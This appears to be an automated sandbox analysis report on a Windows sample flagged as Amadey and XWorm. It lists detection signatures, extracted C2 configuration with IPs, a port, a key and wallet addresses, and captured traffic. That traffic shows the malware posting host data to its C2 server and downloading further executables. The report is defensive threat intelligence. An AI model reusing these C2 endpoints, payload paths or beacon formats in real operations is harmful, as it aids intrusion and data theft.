Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1517696
MD5: a8900c1f255a11688131b9bf0860a730
SHA1: 6067ef527264302b42dd3bf4eca7c5a0f63649be
SHA256: 59c6eacafceee2fbbff6f0c025f5fdfb358a8b50ba3a58ff2047491c17227a70
Tags: exe, user-Bitsight

Detection

Amadey, Go Injector, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Go Injector
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.php(x8 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpnd Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/rstxdhuj.exe5867 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php00342001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpRNAM Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/rstxdhuj.exe Avira URL Cloud: Label: phishing
Source: http://103.130.147.211/Files/5.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: 00000000.00000003.1419233067.00000000051B0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe ReversingLabs: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 188.190.10.161
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 4444
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: <IlwAYl63V65*l#>
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: <Xwormmm>
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: XWorm V5.6
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: USB.exe
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
Source: 11.2.InstallUtil.exe.400000.0.unpack String decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbMg` source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003599000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2027391076.0000000005B30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbx source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F83000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000000B.00000002.2669854535.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @Ho.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669854535.000000000101B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B3F18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B3F08
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_059B2EF0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_059B2EE8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059B41A8h 10_2_059B424D
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059C7770h 10_2_059C7580
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059C7770h 10_2_059C7572
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059CEBA0h 10_2_059CEAE8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then jmp 059CEBA0h 10_2_059CEAE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 10_2_05BAD148

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49709 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.8:49709
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49710 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.8:49711 -> 103.130.147.211:80
Source: Malware configuration extractor IPs: 185.215.113.16
Source: Yara match File source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 04:08:04 GMT Content-Type: application/octet-stream Content-Length: 986112 Last-Modified: Tue, 24 Sep 2024 18:05:31 GMT Connection: keep-alive ETag: "66f2ff6b-f0c00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 04:08:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 24 Sep 2024 09:14:12 GMT ETag: "2fef6a01-622d9edbf71c1" Accept-Ranges: bytes Content-Length: 804219393 Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 38 41 35 34 32 43 39 46 45 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F8A542C9FEFD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /Files/5.exe HTTP/1.1Host: 103.130.147.211
Source: Joe Sandbox View IP Address: 103.130.147.211
Source: Joe Sandbox View IP Address: 185.215.113.16
Source: Joe Sandbox View ASN Name: MYREPUBLIC-AS-IDPTEkaMasRepublikID
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0020BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 9_2_0020BD60
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /Files/5.exe HTTP/1.1Host: 103.130.147.211
Source: global traffic DNS traffic detected: DNS query: google.com
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: 5[1].exe.9.dr String found in binary or memory: http://.css
Source: 5[1].exe.9.dr String found in binary or memory: http://.jpg
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe07.EXER
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe2
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe32.EXEu
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeP
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exePV
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeV
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeY
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeZ0Y
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exed
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef59
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef59e5d67ee87
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef5E
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exej
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exep
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exep0g
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exepf0
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exes
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exet
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Local
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/c
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/ert
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php(x8
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php00342001
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpRNAM
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnd
Source: axplong.exe, 00000009.00000002.2685071970.000000000117D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe
Source: axplong.exe, 00000009.00000002.2685071970.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe5867
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: 5[1].exe.9.dr String found in binary or memory: http://html4/loose.dtd
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5[1].exe.9.dr String found in binary or memory: http://scripts.sil.org/OFL
Source: 5[1].exe.9.dr String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: rstxdhuj.exe, 0000000A.00000002.2018046376.000000000379A000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 5[1].exe.9.dr String found in binary or memory: https://github.com/uber-go/dig/issues/new
Source: 5[1].exe.9.dr String found in binary or memory: https://login.chinacloudapi.cn/cannot
Source: 5[1].exe.9.dr String found in binary or memory: https://login.microsoftonline.com/crypto/rc4:
Source: 5[1].exe.9.dr String found in binary or memory: https://management.azure.commismatching
Source: 5[1].exe.9.dr String found in binary or memory: https://management.chinacloudapi.cnmlkem768:
Source: 5[1].exe.9.dr String found in binary or memory: https://management.usgovcloudapi.nethttps://management.core.windows.net/%v:
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B10F0 NtResumeThread, 10_2_059B10F0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B10E8 NtResumeThread, 10_2_059B10E8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3FE00 NtProtectVirtualMemory, 10_2_05E3FE00
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00243068 9_2_00243068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00204CF0 9_2_00204CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00237D83 9_2_00237D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0024765B 9_2_0024765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00204AF0 9_2_00204AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00248720 9_2_00248720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00246F09 9_2_00246F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0024777B 9_2_0024777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00242BD0 9_2_00242BD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008FC7C8 10_2_008FC7C8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0B78 10_2_008F0B78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0EA0 10_2_008F0EA0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F21D1 10_2_008F21D1
